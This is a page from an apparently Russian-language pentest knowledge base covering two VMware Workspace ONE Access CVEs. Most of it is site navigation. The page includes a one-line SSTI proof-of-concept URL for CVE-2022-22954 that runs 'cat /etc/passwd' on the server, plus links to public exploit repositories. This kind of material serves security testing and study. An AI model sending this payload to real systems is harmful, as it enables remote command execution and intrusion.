AppSec & Pentest
CloudSec
PentestAppSecMobileCloudSec
CloudSec
PentestAppSecMobileCloudSec
  • Sandboxes, Containers, Virtualization
    • Какие бывают
    • Kubernetes
      • About
      • Tools
        • kubectl
        • minikube
        • helm
        • tiller
        • Others
      • Components
      • Concepts
      • Security
      • Learning
      • Conferences & Events
    • Container Runtime Interface (CRI)
      • containerd
      • CRI-0
      • Podman
      • Colima
      • Docker
        • About
        • CLI
        • Dockerfile
        • docker compose
        • Registry
        • Testcontainers
        • [Def] Security
        • [Off] Security
    • Red Hat OpenShift Container Platform (OCP)
      • About
      • OCP Components
        • Platform services
        • Application services
        • Developer services
        • OpenShift Kubernetes Engine
      • Security
        • Container Security
        • Podman
        • Kubernetes Security
        • Securing Platform Services
        • Vulnerabilities
        • CIS
    • VMWare
      • Workspace ONE Access
      • Workspace One UEM SSRF (AirWatch)
      • vSphere
      • vCenter
      • Learn
      • Horizon Security Server
      • VMWare log4j
    • Tools
      • Build container image inside containers
      • Moby
      • Security
  • Cloud
    • Google Cloud Platform (GCP)
      • GCP Components
      • GCP CLI
      • Security
        • Get access to GCP via service-account [json]
        • PrivEsc
        • Papers
      • Courses & Certifications
    • Azure
      • Azure Start
      • Azure CLI
      • Компоненты и механизмы
        • Azure Storage BLOB
        • Подписанные URL (SAS)
      • Papers and Resources
      • Azure Security Center
      • Tools
    • AWS
      • AWS Intro
      • AWS Basics
      • AWS Components
        • Computing
        • Storage
        • Messaging
        • Serverless
        • Business Productivity
        • Network and Content Delivery
        • Mobile
        • Databases
      • AWS Testing
      • Basic Work: Examples
        • AWS Cli
        • AWS SES
        • S3 Bucket
      • Security
        • Enumeration
        • AWS Lambda
        • Разные примеры
        • Learn Materials
      • Books & Papers
      • Courses & Certifications
    • Yandex Cloud
      • YC CLI
      • YC API
      • Cloud Organization
      • VM
        • Cloud Computing
        • Virtual Private Cloud (VPC)
        • Network Load Balancer
      • Data Platform
        • Definitions
        • Как выбрать БД
        • Реляционные БД
        • Нереляционные БД
        • Object Storage and S3
      • Yandex k8s
      • Serverless
      • Security
      • Billing
    • Another platforms
    • OpenStack
    • Tools
      • Tool list
      • Packer
      • Terraform
        • Intro
        • Getting started
        • Configuration
          • Basic
            • Terraform Block
            • Providers
            • Resources
            • Variables
            • Outputs
            • Functions
          • Modules
        • Security
        • Papers
    • Papers
Powered by GitBook
On this page

Was this helpful?

Last updated 2 years ago

CVE-2022-22954: SSTI

PoC:

CVE-2022-22972: Auth Bypass

На Linux серверах. Вероятно связан с VMWare Horizon. Эксплоита нет, патч вышел, скачать не могу:

PoC: 

/catalog-portal/ui/oauth/verify?error=&deviceUdid=${"freemarker.template.utility.Execute"?new()("cat /etc/passwd")}
https://github.com/sherlocksecurity/VMware-CVE-2022-22954
https://kb.vmware.com/s/article/88438
https://github.com/horizon3ai/CVE-2022-22972
  • CVE-2022-22954: SSTI
  • CVE-2022-22972: Auth Bypass
PreviousVMWareNextWorkspace One UEM SSRF (AirWatch)
  1. Sandboxes, Containers, Virtualization
  2. VMWare

Workspace ONE Access